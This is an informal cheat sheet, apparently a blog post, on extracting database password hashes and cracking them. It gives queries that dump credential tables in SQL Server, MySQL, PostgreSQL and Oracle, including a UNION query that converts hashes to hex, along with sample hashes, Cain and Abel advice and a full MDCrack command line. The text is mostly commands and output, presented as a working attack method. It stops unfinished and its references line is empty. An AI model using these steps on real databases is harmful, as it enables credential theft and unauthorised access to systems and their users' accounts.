SQL Server 2000:-
SELECT password from master.dbo.sysxlogins where name='sa'
0x0100- constant header
34767D5C- salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
crack the upper case hash in 'cain and abel' and then work the case sentive hash
SQL server 2005:-
SELECT password_hash FROM sys.sql_logins where name='sa'
0x0100- constant header
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
crack case sensitive hash in cain, try brute force and dictionary based attacks.
update:- following bernardo's comments:-
use function fn_varbintohexstr() to cast password in a hex string.
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL's own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
*mysql < 4.1
mysql> SELECT PASSWORD('mypass');
| PASSWORD('mypass') |
| 6f8c114b58f2ce9e |
*mysql >=4.1
mysql> SELECT PASSWORD('mypass');
| PASSWORD('mypass') |
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
Select user, password from mysql.user
The hashes can be cracked in 'cain and abel'
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called "postgres" or "pgsql")
select usename, passwd from pg_shadow;
usename | passwd
testuser | md5fabb6d7172aadfda4753bf0507ed4396
use mdcrack to crack these hashes:-
$ wine MDCrack-sse.exe --algorithm=MD5 --append=testuser fabb6d7172aadfda4753bf0507ed4396
select name, password, spare4 from sys.user$
hashes could be cracked using 'cain and abel' or thc-orakelcrackert11g
More on Oracle later, i am a bit bored....
References/Copied from:-